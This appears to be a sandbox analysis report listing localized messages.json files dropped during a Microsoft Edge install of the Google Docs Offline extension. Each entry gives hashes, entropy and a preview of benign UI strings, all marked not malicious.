C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\nn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
